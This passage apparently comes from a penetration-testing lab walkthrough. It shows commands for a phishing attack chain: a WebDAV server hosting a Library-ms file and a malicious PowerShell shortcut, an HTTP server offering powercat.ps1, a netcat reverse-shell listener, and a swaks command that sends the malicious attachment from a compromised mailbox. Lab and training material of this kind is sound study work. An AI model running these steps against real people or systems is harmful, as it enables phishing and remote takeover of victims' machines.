Transfer both files to the attacking host under /webdav and start the server from within that directory:
# List the directory's contents
$ ls
config.Library-ms powershell.lnk
# Start the WEBDAV server
$ sudo wsgidav --host=0.0.0.0 --port=80 --root=./ --auth=anonymous
Start the HTTP server and the listener:
# List the directory's contents
$ ls
powercat.ps1
# Start the HTTP server
$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
# Start the listener
$ sudo nc -lnvp 4444
Send the phising email along with the malicious attachment:
# Send the phising email to jim
$ swaks --to target@example.com --from compromized-email@example.com --header "Subject: Important!!!" --body @body.txt --attach @config.Library-ms --server 192.168.X.189 --auth LOGIN --auth-user compromized-email@example.com --auth-password 'Pass123!'